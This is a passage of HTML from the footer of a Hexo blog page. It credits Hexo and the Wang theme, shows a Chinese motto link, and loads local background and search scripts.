            <p class="hover-underline night" style="display: inline;">Hexo</p>
        </a> 驱动
        <p style="display: inline; color: red;">❤</p>
        <a target="_blank" rel="noopener" href="https://github.com/xingwangzhe/hexo-theme-wang" alt="Wang">
            <p class="hover-underline night" style="display: inline;">Wang</p>
        </a> 主题构建
    </span>

    <!-- 带图片的链接 -->
    <div class="footer-links">
        
    </div>

    <!-- 纯文本链接 -->
    <div class="footer-text-links">
        
            
                <a href="" target="_blank" rel="noopener">
                    宏愿纵未了,奋斗总不太晚
                </a>
            
        
    </div>
</footer>
    
<script src="/js/background.js"></script>
    
        
<script src="/js/search.js"></script>
    
</main>
</body>
</html>
